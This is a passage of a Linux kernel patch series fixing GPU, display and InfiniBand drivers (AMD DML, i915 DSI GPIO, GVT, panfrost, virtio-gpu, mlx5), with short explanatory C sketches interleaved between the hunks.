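	double UrgentLatency = 4.0;		/* us */
	double HTotal        = 2200.0, PixelClockMHz = 594.0;
	double LineTime      = HTotal / PixelClockMHz;	/* us per line */
	double SwathHeight   = 16.0, SwathWidth = 1920.0, Bpp = 4.0;
	double DETBufferSize = 192.0 * 1024.0;	/* bytes */
	double VRatio        = 1.0;

	/* Time to fetch one swath for every surface (single surface here). */
	double FetchUs = SwathHeight * SwathWidth * Bpp / ReturnBW + UrgentLatency;

	/* Lines the DET can hold minus one in-flight swath, drained at VRatio. */
	double HideUs = (floor(DETBufferSize / Bpp / SwathWidth) - SwathHeight)
			/ VRatio * LineTime;

	printf("fetch %.2f us vs hiding %.2f us -> %s DET latency hiding\n",
	       FetchUs, HideUs, HideUs < FetchUs ? "NOT enough" : "enough");
	return 0;
}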
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h
+index 3989c2a28faec..779c6805f5997 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h
+@@ -1141,4 +1141,22 @@ void dml32_CalculateImmediateFlipBandwithSupport(unsigned int NumberOfActiveSurf
+ 		double  *FractionOfUrgentBandwidth,
+ 		bool *ImmediateFlipBandwidthSupport);
+ 
++bool dml32_CalculateDETSwathFillLatencyHiding(unsigned int NumberOfActiveSurfaces,
++		double ReturnBW,
++		double UrgentLatency,
++		unsigned int SwathHeightY[],
++		unsigned int SwathHeightC[],
++		unsigned int SwathWidthY[],
++		unsigned int SwathWidthC[],
++		double  BytePerPixelInDETY[],
++		double  BytePerPixelInDETC[],
++		unsigned int    DETBufferSizeY[],
++		unsigned int    DETBufferSizeC[],
++		unsigned int	NumOfDPP[],
++		unsigned int	HTotal[],
++		double	PixelClock[],
++		double	VRatioY[],
++		double	VRatioC[],
++		enum dm_use_mall_for_pstate_change_mode UsesMALLForPStateChange[DC__NUM_DPP__MAX]);
++
+ #endif
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h
+index a0207a8f87565..2b34b02dbd459 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h
+@@ -1041,6 +1041,7 @@ struct vba_vars_st {
+ 	double MinFullDETBufferingTime;
+ 	double AverageReadBandwidthGBytePerSecond;
+ 	bool   FirstMainPlane;
++	bool NotEnoughDETSwathFillLatencyHiding;
+ 
+ 	unsigned int ViewportWidthChroma[DC__NUM_DPP__MAX];
+ 	unsigned int ViewportHeightChroma[DC__NUM_DPP__MAX];
+@@ -1224,6 +1225,7 @@ struct vba_vars_st {
+ 	unsigned int BlockWidthC[DC__NUM_DPP__MAX];
+ 	unsigned int SubViewportLinesNeededInMALL[DC__NUM_DPP__MAX];
+ 	bool VActiveBandwithSupport[DC__VOLTAGE_STATES][2];
++	bool NotEnoughDETSwathFillLatencyHidingPerState[DC__VOLTAGE_STATES][2];
+ 	struct dummy_vars dummy_vars;
+ };
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+index fce69fa446d58..2cbc1292ab382 100644
+--- a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
++++ b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+@@ -41,9 +41,11 @@
+ 
+ #include "i915_drv.h"
+ #include "i915_reg.h"
++#include "intel_de.h"
+ #include "intel_display_types.h"
+ #include "intel_dsi.h"
+ #include "intel_dsi_vbt.h"
++#include "intel_gmbus_regs.h"
+ #include "vlv_dsi.h"
+ #include "vlv_dsi_regs.h"
+ #include "vlv_sideband.h"
+@@ -377,6 +379,85 @@ static void icl_exec_gpio(struct intel_connector *connector,
+ 	drm_dbg_kms(&dev_priv->drm, "Skipping ICL GPIO element execution\n");
+ }
+ 
++enum {
++	MIPI_RESET_1 = 0,
++	MIPI_AVDD_EN_1,
++	MIPI_BKLT_EN_1,
++	MIPI_AVEE_EN_1,
++	MIPI_VIO_EN_1,
++	MIPI_RESET_2,
++	MIPI_AVDD_EN_2,
++	MIPI_BKLT_EN_2,
++	MIPI_AVEE_EN_2,
++	MIPI_VIO_EN_2,
++};
++
++static void icl_native_gpio_set_value(struct drm_i915_private *dev_priv,
++				      int gpio, bool value)
++{
++	int index;
++
++	if (drm_WARN_ON(&dev_priv->drm, DISPLAY_VER(dev_priv) == 11 && gpio >= MIPI_RESET_2))
++		return;
++
++	switch (gpio) {
++	case MIPI_RESET_1:
++	case MIPI_RESET_2:
++		index = gpio == MIPI_RESET_1 ? HPD_PORT_A : HPD_PORT_B;
++
++		/*
++		 * Disable HPD to set the pin to output, and set output
++		 * value. The HPD pin should not be enabled for DSI anyway,
++		 * assuming the board design and VBT are sane, and the pin isn't
++		 * used by a non-DSI encoder.
++		 *
++		 * The locking protects against concurrent SHOTPLUG_CTL_DDI
++		 * modifications in irq setup and handling.
++		 */
++		spin_lock_irq(&dev_priv->irq_lock);
++		intel_de_rmw(dev_priv, SHOTPLUG_CTL_DDI,
++			     SHOTPLUG_CTL_DDI_HPD_ENABLE(index) |
++			     SHOTPLUG_CTL_DDI_HPD_OUTPUT_DATA(index),
++			     value ? SHOTPLUG_CTL_DDI_HPD_OUTPUT_DATA(index) : 0);
++		spin_unlock_irq(&dev_priv->irq_lock);
++		break;
++	case MIPI_AVDD_EN_1:
++	case MIPI_AVDD_EN_2:
++		index = gpio == MIPI_AVDD_EN_1 ? 0 : 1;
++
++		intel_de_rmw(dev_priv, PP_CONTROL(index), PANEL_POWER_ON,
++			     value ? PANEL_POWER_ON : 0);
++		break;
++	case MIPI_BKLT_EN_1:
++	case MIPI_BKLT_EN_2:
++		index = gpio == MIPI_BKLT_EN_1 ? 0 : 1;
++
++		intel_de_rmw(dev_priv, PP_CONTROL(index), EDP_BLC_ENABLE,
++			     value ? EDP_BLC_ENABLE : 0);
++		break;
++	case MIPI_AVEE_EN_1:
++	case MIPI_AVEE_EN_2:
++		index = gpio == MIPI_AVEE_EN_1 ? 1 : 2;
++
++		intel_de_rmw(dev_priv, GPIO(dev_priv, index),
++			     GPIO_CLOCK_VAL_OUT,
++			     GPIO_CLOCK_DIR_MASK | GPIO_CLOCK_DIR_OUT |
++			     GPIO_CLOCK_VAL_MASK | (value ? GPIO_CLOCK_VAL_OUT : 0));
++		break;
++	case MIPI_VIO_EN_1:
++	case MIPI_VIO_EN_2:
++		index = gpio == MIPI_VIO_EN_1 ? 1 : 2;
++
++		intel_de_rmw(dev_priv, GPIO(dev_priv, index),
++			     GPIO_DATA_VAL_OUT,
++			     GPIO_DATA_DIR_MASK | GPIO_DATA_DIR_OUT |
++			     GPIO_DATA_VAL_MASK | (value ? GPIO_DATA_VAL_OUT : 0));
++		break;
++	default:
++		MISSING_CASE(gpio);
++	}
++}
++
+ static const u8 *mipi_exec_gpio(struct intel_dsi *intel_dsi, const u8 *data)
+ {
+ 	struct drm_device *dev = intel_dsi->base.base.dev;
+@@ -384,8 +465,7 @@ static const u8 *mipi_exec_gpio(struct intel_dsi *intel_dsi, const u8 *data)
+ 	struct intel_connector *connector = intel_dsi->attached_connector;
+ 	u8 gpio_source, gpio_index = 0, gpio_number;
+ 	bool value;
+-
+-	drm_dbg_kms(&dev_priv->drm, "\n");
++	bool native = DISPLAY_VER(dev_priv) >= 11;
+ 
+ 	if (connector->panel.vbt.dsi.seq_version >= 3)
+ 		gpio_index = *data++;
+@@ -398,10 +478,18 @@ static const u8 *mipi_exec_gpio(struct intel_dsi *intel_dsi, const u8 *data)
+ 	else
+ 		gpio_source = 0;
+ 
++	if (connector->panel.vbt.dsi.seq_version >= 4 && *data & BIT(1))
++		native = false;
++
+ 	/* pull up/down */
+ 	value = *data++ & 1;
+ 
+-	if (DISPLAY_VER(dev_priv) >= 11)
++	drm_dbg_kms(&dev_priv->drm, "GPIO index %u, number %u, source %u, native %s, set to %s\n",
++		    gpio_index, gpio_number, gpio_source, str_yes_no(native), str_on_off(value));
++
++	if (native)
++		icl_native_gpio_set_value(dev_priv, gpio_number, value);
++	else if (DISPLAY_VER(dev_priv) >= 11)
+ 		icl_exec_gpio(connector, gpio_source, gpio_index, value);
+ 	else if (IS_VALLEYVIEW(dev_priv))
+ 		vlv_exec_gpio(connector, gpio_source, gpio_number, value);
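Every native GPIO case in icl_native_gpio_set_value() above is a read-modify-write of one display register via intel_de_rmw(), with the HPD cases additionally taken under the irq spinlock because SHOTPLUG_CTL_DDI is shared with the interrupt handler (see the icp_irq_handler hunk below). A userspace model of the rmw shape:

#include <stdint.h>
#include <stdio.h>

/* Userspace model of a read-modify-write register update: clear the
 * masked-off bits, then OR in the new ones. intel_de_rmw(i915, reg,
 * clear, set) has the same shape against real MMIO. */
static uint32_t rmw(uint32_t *reg, uint32_t clear, uint32_t set)
{
	uint32_t old = *reg;

	*reg = (old & ~clear) | set;
	return old;
}

int main(void)
{
	uint32_t reg = 0x0000000f;

	rmw(&reg, 0x3, 0x10);		/* clear bits 0-1, set bit 4 */
	printf("reg = 0x%08x\n", reg);	/* prints 0x0000001c */
	return 0;
}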
+diff --git a/drivers/gpu/drm/i915/gvt/debugfs.c b/drivers/gpu/drm/i915/gvt/debugfs.c
+index 9f1c209d92511..e08ed0e9f1653 100644
+--- a/drivers/gpu/drm/i915/gvt/debugfs.c
++++ b/drivers/gpu/drm/i915/gvt/debugfs.c
+@@ -175,8 +175,13 @@ void intel_gvt_debugfs_add_vgpu(struct intel_vgpu *vgpu)
+  */
+ void intel_gvt_debugfs_remove_vgpu(struct intel_vgpu *vgpu)
+ {
+-	debugfs_remove_recursive(vgpu->debugfs);
+-	vgpu->debugfs = NULL;
++	struct intel_gvt *gvt = vgpu->gvt;
++	struct drm_minor *minor = gvt->gt->i915->drm.primary;
++
++	if (minor->debugfs_root && gvt->debugfs_root) {
++		debugfs_remove_recursive(vgpu->debugfs);
++		vgpu->debugfs = NULL;
++	}
+ }
+ 
+ /**
+@@ -199,6 +204,10 @@ void intel_gvt_debugfs_init(struct intel_gvt *gvt)
+  */
+ void intel_gvt_debugfs_clean(struct intel_gvt *gvt)
+ {
+-	debugfs_remove_recursive(gvt->debugfs_root);
+-	gvt->debugfs_root = NULL;
++	struct drm_minor *minor = gvt->gt->i915->drm.primary;
++
++	if (minor->debugfs_root) {
++		debugfs_remove_recursive(gvt->debugfs_root);
++		gvt->debugfs_root = NULL;
++	}
+ }
+diff --git a/drivers/gpu/drm/i915/gvt/gtt.c b/drivers/gpu/drm/i915/gvt/gtt.c
+index ce0eb03709c3f..80c60754a5c1c 100644
+--- a/drivers/gpu/drm/i915/gvt/gtt.c
++++ b/drivers/gpu/drm/i915/gvt/gtt.c
+@@ -1214,10 +1214,8 @@ static int split_2MB_gtt_entry(struct intel_vgpu *vgpu,
+ 	for_each_shadow_entry(sub_spt, &sub_se, sub_index) {
+ 		ret = intel_gvt_dma_map_guest_page(vgpu, start_gfn + sub_index,
+ 						   PAGE_SIZE, &dma_addr);
+-		if (ret) {
+-			ppgtt_invalidate_spt(spt);
+-			return ret;
+-		}
++		if (ret)
++			goto err;
+ 		sub_se.val64 = se->val64;
+ 
+ 		/* Copy the PAT field from PDE. */
+@@ -1236,6 +1234,17 @@ static int split_2MB_gtt_entry(struct intel_vgpu *vgpu,
+ 	ops->set_pfn(se, sub_spt->shadow_page.mfn);
+ 	ppgtt_set_shadow_entry(spt, se, index);
+ 	return 0;
++err:
++	/* Cancel the existing address mappings of DMA addr. */
++	for_each_present_shadow_entry(sub_spt, &sub_se, sub_index) {
++		gvt_vdbg_mm("invalidate 4K entry\n");
++		ppgtt_invalidate_pte(sub_spt, &sub_se);
++	}
++	/* Release the newly allocated spt. */
++	trace_spt_change(sub_spt->vgpu->id, "release", sub_spt,
++		sub_spt->guest_page.gfn, sub_spt->shadow_page.type);
++	ppgtt_free_spt(sub_spt);
++	return ret;
+ }
+ 
+ static int split_64KB_gtt_entry(struct intel_vgpu *vgpu,
+diff --git a/drivers/gpu/drm/i915/gvt/scheduler.c b/drivers/gpu/drm/i915/gvt/scheduler.c
+index d6fe94cd0fdb6..8342d95f56cbc 100644
+--- a/drivers/gpu/drm/i915/gvt/scheduler.c
++++ b/drivers/gpu/drm/i915/gvt/scheduler.c
+@@ -696,6 +696,7 @@ intel_vgpu_shadow_mm_pin(struct intel_vgpu_workload *workload)
+ 
+ 	if (workload->shadow_mm->type != INTEL_GVT_MM_PPGTT ||
+ 	    !workload->shadow_mm->ppgtt_mm.shadowed) {
++		intel_vgpu_unpin_mm(workload->shadow_mm);
+ 		gvt_vgpu_err("workload shadow ppgtt isn't ready\n");
+ 		return -EINVAL;
+ 	}
+diff --git a/drivers/gpu/drm/i915/i915_irq.c b/drivers/gpu/drm/i915/i915_irq.c
+index 86a42d9e80412..f93ffa6626a57 100644
+--- a/drivers/gpu/drm/i915/i915_irq.c
++++ b/drivers/gpu/drm/i915/i915_irq.c
+@@ -1981,8 +1981,11 @@ static void icp_irq_handler(struct drm_i915_private *dev_priv, u32 pch_iir)
+ 	if (ddi_hotplug_trigger) {
+ 		u32 dig_hotplug_reg;
+ 
++		/* Locking due to DSI native GPIO sequences */
++		spin_lock(&dev_priv->irq_lock);
+ 		dig_hotplug_reg = intel_uncore_read(&dev_priv->uncore, SHOTPLUG_CTL_DDI);
+ 		intel_uncore_write(&dev_priv->uncore, SHOTPLUG_CTL_DDI, dig_hotplug_reg);
++		spin_unlock(&dev_priv->irq_lock);
+ 
+ 		intel_get_hpd_pins(dev_priv, &pin_mask, &long_mask,
+ 				   ddi_hotplug_trigger, dig_hotplug_reg,
+diff --git a/drivers/gpu/drm/i915/i915_reg.h b/drivers/gpu/drm/i915/i915_reg.h
+index da35bb2db26b6..64eacd11b8bff 100644
+--- a/drivers/gpu/drm/i915/i915_reg.h
++++ b/drivers/gpu/drm/i915/i915_reg.h
+@@ -6035,6 +6035,7 @@
+ 
+ #define SHOTPLUG_CTL_DDI				_MMIO(0xc4030)
+ #define   SHOTPLUG_CTL_DDI_HPD_ENABLE(hpd_pin)			(0x8 << (_HPD_PIN_DDI(hpd_pin) * 4))
++#define   SHOTPLUG_CTL_DDI_HPD_OUTPUT_DATA(hpd_pin)		(0x4 << (_HPD_PIN_DDI(hpd_pin) * 4))
+ #define   SHOTPLUG_CTL_DDI_HPD_STATUS_MASK(hpd_pin)		(0x3 << (_HPD_PIN_DDI(hpd_pin) * 4))
+ #define   SHOTPLUG_CTL_DDI_HPD_NO_DETECT(hpd_pin)		(0x0 << (_HPD_PIN_DDI(hpd_pin) * 4))
+ #define   SHOTPLUG_CTL_DDI_HPD_SHORT_DETECT(hpd_pin)		(0x1 << (_HPD_PIN_DDI(hpd_pin) * 4))
+diff --git a/drivers/gpu/drm/imx/ipuv3-plane.c b/drivers/gpu/drm/imx/ipuv3-plane.c
+index dba4f7d81d693..80142d9a4a552 100644
+--- a/drivers/gpu/drm/imx/ipuv3-plane.c
++++ b/drivers/gpu/drm/imx/ipuv3-plane.c
+@@ -614,6 +614,11 @@ static void ipu_plane_atomic_update(struct drm_plane *plane,
+ 		break;
+ 	}
+ 
++	if (ipu_plane->dp_flow == IPU_DP_FLOW_SYNC_BG)
++		width = ipu_src_rect_width(new_state);
++	else
++		width = drm_rect_width(&new_state->src) >> 16;
++
+ 	eba = drm_plane_state_to_eba(new_state, 0);
+ 
+ 	/*
+@@ -622,8 +627,7 @@ static void ipu_plane_atomic_update(struct drm_plane *plane,
+ 	 */
+ 	if (ipu_state->use_pre) {
+ 		axi_id = ipu_chan_assign_axi_id(ipu_plane->dma);
+-		ipu_prg_channel_configure(ipu_plane->ipu_ch, axi_id,
+-					  ipu_src_rect_width(new_state),
++		ipu_prg_channel_configure(ipu_plane->ipu_ch, axi_id, width,
+ 					  drm_rect_height(&new_state->src) >> 16,
+ 					  fb->pitches[0], fb->format->format,
+ 					  fb->modifier, &eba);
+@@ -678,9 +682,8 @@ static void ipu_plane_atomic_update(struct drm_plane *plane,
+ 		break;
+ 	}
+ 
+-	ipu_dmfc_config_wait4eot(ipu_plane->dmfc, ALIGN(drm_rect_width(dst), 8));
++	ipu_dmfc_config_wait4eot(ipu_plane->dmfc, width);
+ 
+-	width = ipu_src_rect_width(new_state);
+ 	height = drm_rect_height(&new_state->src) >> 16;
+ 	info = drm_format_info(fb->format->format);
+ 	ipu_calculate_bursts(width, info->cpp[0], fb->pitches[0],
+@@ -744,8 +747,7 @@ static void ipu_plane_atomic_update(struct drm_plane *plane,
+ 		ipu_cpmem_set_burstsize(ipu_plane->ipu_ch, 16);
+ 
+ 		ipu_cpmem_zero(ipu_plane->alpha_ch);
+-		ipu_cpmem_set_resolution(ipu_plane->alpha_ch,
+-					 ipu_src_rect_width(new_state),
++		ipu_cpmem_set_resolution(ipu_plane->alpha_ch, width,
+ 					 drm_rect_height(&new_state->src) >> 16);
+ 		ipu_cpmem_set_format_passthrough(ipu_plane->alpha_ch, 8);
+ 		ipu_cpmem_set_high_priority(ipu_plane->alpha_ch);
+diff --git a/drivers/gpu/drm/meson/meson_viu.c b/drivers/gpu/drm/meson/meson_viu.c
+index d4b907889a21d..cd399b0b71814 100644
+--- a/drivers/gpu/drm/meson/meson_viu.c
++++ b/drivers/gpu/drm/meson/meson_viu.c
+@@ -436,15 +436,14 @@ void meson_viu_init(struct meson_drm *priv)
+ 
+ 	/* Initialize OSD1 fifo control register */
+ 	reg = VIU_OSD_DDR_PRIORITY_URGENT |
+-		VIU_OSD_HOLD_FIFO_LINES(31) |
+ 		VIU_OSD_FIFO_DEPTH_VAL(32) | /* fifo_depth_val: 32*8=256 */
+ 		VIU_OSD_WORDS_PER_BURST(4) | /* 4 words in 1 burst */
+ 		VIU_OSD_FIFO_LIMITS(2);      /* fifo_lim: 2*16=32 */
+ 
+ 	if (meson_vpu_is_compatible(priv, VPU_COMPATIBLE_G12A))
+-		reg |= VIU_OSD_BURST_LENGTH_32;
++		reg |= (VIU_OSD_BURST_LENGTH_32 | VIU_OSD_HOLD_FIFO_LINES(31));
+ 	else
+-		reg |= VIU_OSD_BURST_LENGTH_64;
++		reg |= (VIU_OSD_BURST_LENGTH_64 | VIU_OSD_HOLD_FIFO_LINES(4));
+ 
+ 	writel_relaxed(reg, priv->io_base + _REG(VIU_OSD1_FIFO_CTRL_STAT));
+ 	writel_relaxed(reg, priv->io_base + _REG(VIU_OSD2_FIFO_CTRL_STAT));
+diff --git a/drivers/gpu/drm/panfrost/panfrost_drv.c b/drivers/gpu/drm/panfrost/panfrost_drv.c
+index 2fa5afe212889..919e6cc049828 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_drv.c
++++ b/drivers/gpu/drm/panfrost/panfrost_drv.c
+@@ -82,6 +82,7 @@ static int panfrost_ioctl_create_bo(struct drm_device *dev, void *data,
+ 	struct panfrost_gem_object *bo;
+ 	struct drm_panfrost_create_bo *args = data;
+ 	struct panfrost_gem_mapping *mapping;
++	int ret;
+ 
+ 	if (!args->size || args->pad ||
+ 	    (args->flags & ~(PANFROST_BO_NOEXEC | PANFROST_BO_HEAP)))
+@@ -92,21 +93,29 @@ static int panfrost_ioctl_create_bo(struct drm_device *dev, void *data,
+ 	    !(args->flags & PANFROST_BO_NOEXEC))
+ 		return -EINVAL;
+ 
+-	bo = panfrost_gem_create_with_handle(file, dev, args->size, args->flags,
+-					     &args->handle);
++	bo = panfrost_gem_create(dev, args->size, args->flags);
+ 	if (IS_ERR(bo))
+ 		return PTR_ERR(bo);
+ 
++	ret = drm_gem_handle_create(file, &bo->base.base, &args->handle);
++	if (ret)
++		goto out;
++
+ 	mapping = panfrost_gem_mapping_get(bo, priv);
+-	if (!mapping) {
+-		drm_gem_object_put(&bo->base.base);
+-		return -EINVAL;
++	if (mapping) {
++		args->offset = mapping->mmnode.start << PAGE_SHIFT;
++		panfrost_gem_mapping_put(mapping);
++	} else {
++		/* This can only happen if the handle from
++		 * drm_gem_handle_create() has already been guessed and freed
++		 * by user space
++		 */
++		ret = -EINVAL;
+ 	}
+ 
+-	args->offset = mapping->mmnode.start << PAGE_SHIFT;
+-	panfrost_gem_mapping_put(mapping);
+-
+-	return 0;
++out:
++	drm_gem_object_put(&bo->base.base);
++	return ret;
+ }
+ 
+ /**
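The reordered panfrost create path relies on GEM reference counting: drm_gem_handle_create() takes a reference of its own, so the creation reference is now dropped on every exit path, success included, instead of only on error. A toy model of that ownership rule; the names and error codes are illustrative:

#include <stdio.h>

struct obj {
	int refcount;
};

static void obj_put(struct obj *o)
{
	if (--o->refcount == 0)
		printf("object freed\n");
}

/* Stand-in for drm_gem_handle_create(): on success the handle table now
 * holds a reference of its own. */
static int handle_create(struct obj *o, int fail)
{
	if (fail)
		return -22;	/* -EINVAL, for the sketch */
	o->refcount++;
	return 0;
}

int main(void)
{
	struct obj o = { .refcount = 1 };	/* creation reference */
	int ret = handle_create(&o, 0);

	/* Success or failure, the creation reference is dropped exactly
	 * once; only the handle's reference (if any) keeps the object. */
	obj_put(&o);
	printf("ret=%d refcount=%d\n", ret, o.refcount);
	return 0;
}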
+diff --git a/drivers/gpu/drm/panfrost/panfrost_gem.c b/drivers/gpu/drm/panfrost/panfrost_gem.c
+index 293e799e2fe81..3c812fbd126fd 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_gem.c
++++ b/drivers/gpu/drm/panfrost/panfrost_gem.c
+@@ -235,12 +235,8 @@ struct drm_gem_object *panfrost_gem_create_object(struct drm_device *dev, size_t
+ }
+ 
+ struct panfrost_gem_object *
+-panfrost_gem_create_with_handle(struct drm_file *file_priv,
+-				struct drm_device *dev, size_t size,
+-				u32 flags,
+-				uint32_t *handle)
++panfrost_gem_create(struct drm_device *dev, size_t size, u32 flags)
+ {
+-	int ret;
+ 	struct drm_gem_shmem_object *shmem;
+ 	struct panfrost_gem_object *bo;
+ 
+@@ -256,16 +252,6 @@ panfrost_gem_create_with_handle(struct drm_file *file_priv,
+ 	bo->noexec = !!(flags & PANFROST_BO_NOEXEC);
+ 	bo->is_heap = !!(flags & PANFROST_BO_HEAP);
+ 
+-	/*
+-	 * Allocate an id of idr table where the obj is registered
+-	 * and handle has the id what user can see.
+-	 */
+-	ret = drm_gem_handle_create(file_priv, &shmem->base, handle);
+-	/* drop reference from allocate - handle holds it now. */
+-	drm_gem_object_put(&shmem->base);
+-	if (ret)
+-		return ERR_PTR(ret);
+-
+ 	return bo;
+ }
+ 
+diff --git a/drivers/gpu/drm/panfrost/panfrost_gem.h b/drivers/gpu/drm/panfrost/panfrost_gem.h
+index 8088d5fd8480e..ad2877eeeccdf 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_gem.h
++++ b/drivers/gpu/drm/panfrost/panfrost_gem.h
+@@ -69,10 +69,7 @@ panfrost_gem_prime_import_sg_table(struct drm_device *dev,
+ 				   struct sg_table *sgt);
+ 
+ struct panfrost_gem_object *
+-panfrost_gem_create_with_handle(struct drm_file *file_priv,
+-				struct drm_device *dev, size_t size,
+-				u32 flags,
+-				uint32_t *handle);
++panfrost_gem_create(struct drm_device *dev, size_t size, u32 flags);
+ 
+ int panfrost_gem_open(struct drm_gem_object *obj, struct drm_file *file_priv);
+ void panfrost_gem_close(struct drm_gem_object *obj,
+diff --git a/drivers/gpu/drm/virtio/virtgpu_object.c b/drivers/gpu/drm/virtio/virtgpu_object.c
+index 8d7728181de01..c7e74cf130221 100644
+--- a/drivers/gpu/drm/virtio/virtgpu_object.c
++++ b/drivers/gpu/drm/virtio/virtgpu_object.c
+@@ -184,7 +184,7 @@ int virtio_gpu_object_create(struct virtio_gpu_device *vgdev,
+ 	struct virtio_gpu_object_array *objs = NULL;
+ 	struct drm_gem_shmem_object *shmem_obj;
+ 	struct virtio_gpu_object *bo;
+-	struct virtio_gpu_mem_entry *ents;
++	struct virtio_gpu_mem_entry *ents = NULL;
+ 	unsigned int nents;
+ 	int ret;
+ 
+@@ -210,7 +210,7 @@ int virtio_gpu_object_create(struct virtio_gpu_device *vgdev,
+ 		ret = -ENOMEM;
+ 		objs = virtio_gpu_array_alloc(1);
+ 		if (!objs)
+-			goto err_put_id;
++			goto err_free_entry;
+ 		virtio_gpu_array_add_obj(objs, &bo->base.base);
+ 
+ 		ret = virtio_gpu_array_lock_resv(objs);
+@@ -239,6 +239,8 @@ int virtio_gpu_object_create(struct virtio_gpu_device *vgdev,
+ 
+ err_put_objs:
+ 	virtio_gpu_array_put_free(objs);
++err_free_entry:
++	kvfree(ents);
+ err_put_id:
+ 	virtio_gpu_resource_id_put(vgdev, bo->hw_res_handle);
+ err_free_gem:
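The virtio_gpu fix extends the usual goto-unwind chain with an err_free_entry label and initializes ents to NULL so the early jump is safe. The general shape, relying on free(NULL) being a no-op just like kvfree(NULL) in the kernel:

#include <stdlib.h>

/* Error labels run in reverse order of acquisition; initializing the
 * pointers to NULL makes an early jump harmless. */
static int create(void)
{
	void *ents = NULL;
	void *objs = NULL;
	int ret = 0;

	ents = malloc(64);
	if (!ents)
		return -12;	/* -ENOMEM */

	objs = malloc(32);
	if (!objs) {
		ret = -12;
		goto err_free_entry;
	}

	/* ... success: resources handed off or released here ... */
	free(objs);
	free(ents);
	return 0;

err_free_entry:
	free(ents);	/* free(NULL) would also be fine */
	return ret;
}

int main(void)
{
	return create() ? 1 : 0;
}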
+diff --git a/drivers/infiniband/hw/mlx5/counters.c b/drivers/infiniband/hw/mlx5/counters.c
+index 945758f395236..3e1272695d993 100644
+--- a/drivers/infiniband/hw/mlx5/counters.c
++++ b/drivers/infiniband/hw/mlx5/counters.c
+@@ -278,7 +278,6 @@ static int do_get_hw_stats(struct ib_device *ibdev,
+ 	const struct mlx5_ib_counters *cnts = get_counters(dev, port_num - 1);
+ 	struct mlx5_core_dev *mdev;
+ 	int ret, num_counters;
+-	u32 mdev_port_num;
+ 
+ 	if (!stats)
+ 		return -EINVAL;
+@@ -299,8 +298,9 @@ static int do_get_hw_stats(struct ib_device *ibdev,
+ 	}
+ 
+ 	if (MLX5_CAP_GEN(dev->mdev, cc_query_allowed)) {
+-		mdev = mlx5_ib_get_native_port_mdev(dev, port_num,
+-						    &mdev_port_num);
++		if (!port_num)
++			port_num = 1;
++		mdev = mlx5_ib_get_native_port_mdev(dev, port_num, NULL);
+ 		if (!mdev) {
+ 			/* If port is not affiliated yet, its in down state
+ 			 * which doesn't have any counters yet, so it would be
+diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c
+index 40d9410ec3033..cf953d23d18da 100644
+--- a/drivers/infiniband/hw/mlx5/qp.c
++++ b/drivers/infiniband/hw/mlx5/qp.c
+@@ -4502,6 +4502,40 @@ static bool mlx5_ib_modify_qp_allowed(struct mlx5_ib_dev *dev,
+ 	return false;
+ }
+ 
++static int validate_rd_atomic(struct mlx5_ib_dev *dev, struct ib_qp_attr *attr,
++			      int attr_mask, enum ib_qp_type qp_type)
++{
++	int log_max_ra_res;
++	int log_max_ra_req;
++
++	if (qp_type == MLX5_IB_QPT_DCI) {
++		log_max_ra_res = 1 << MLX5_CAP_GEN(dev->mdev,
++						   log_max_ra_res_dc);
++		log_max_ra_req = 1 << MLX5_CAP_GEN(dev->mdev,
++						   log_max_ra_req_dc);
++	} else {
++		log_max_ra_res = 1 << MLX5_CAP_GEN(dev->mdev,
++						   log_max_ra_res_qp);
++		log_max_ra_req = 1 << MLX5_CAP_GEN(dev->mdev,
++						   log_max_ra_req_qp);
++	}
++
++	if (attr_mask & IB_QP_MAX_QP_RD_ATOMIC &&
++	    attr->max_rd_atomic > log_max_ra_res) {
++		mlx5_ib_dbg(dev, "invalid max_rd_atomic value %d\n",
++			    attr->max_rd_atomic);
++		return false;
++	}
++
++	if (attr_mask & IB_QP_MAX_DEST_RD_ATOMIC &&
++	    attr->max_dest_rd_atomic > log_max_ra_req) {
++		mlx5_ib_dbg(dev, "invalid max_dest_rd_atomic value %d\n",
++			    attr->max_dest_rd_atomic);
++		return false;
++	}
++	return true;
++}
++
+ int mlx5_ib_modify_qp(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 		      int attr_mask, struct ib_udata *udata)
+ {
+@@ -4589,21 +4623,8 @@ int mlx5_ib_modify_qp(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 		goto out;
+ 	}
+ 
+-	if (attr_mask & IB_QP_MAX_QP_RD_ATOMIC &&
+-	    attr->max_rd_atomic >
+-	    (1 << MLX5_CAP_GEN(dev->mdev, log_max_ra_res_qp))) {
+-		mlx5_ib_dbg(dev, "invalid max_rd_atomic value %d\n",
+-			    attr->max_rd_atomic);
+-		goto out;
+-	}
+-
+-	if (attr_mask & IB_QP_MAX_DEST_RD_ATOMIC &&
+-	    attr->max_dest_rd_atomic >
+-	    (1 << MLX5_CAP_GEN(dev->mdev, log_max_ra_req_qp))) {
+-		mlx5_ib_dbg(dev, "invalid max_dest_rd_atomic value %d\n",
+-			    attr->max_dest_rd_atomic);
++	if (!validate_rd_atomic(dev, attr, attr_mask, qp_type))
+ 		goto out;
+-	}
+ 
+ 	if (cur_state == new_state && cur_state == IB_QPS_RESET) {
+ 		err = 0;
+diff --git a/drivers/net/bonding/bond_3ad.c b/drivers/net/bonding/bond_3ad.c
+index e58a1e0cadd2e..9270977e6c7ff 100644
+--- a/drivers/net/bonding/bond_3ad.c
++++ b/drivers/net/bonding/bond_3ad.c
+@@ -1540,6 +1540,7 @@ static void ad_port_selection_logic(struct port *port, bool *update_slave_arr)
+ 			slave_err(bond->dev, port->slave->dev,
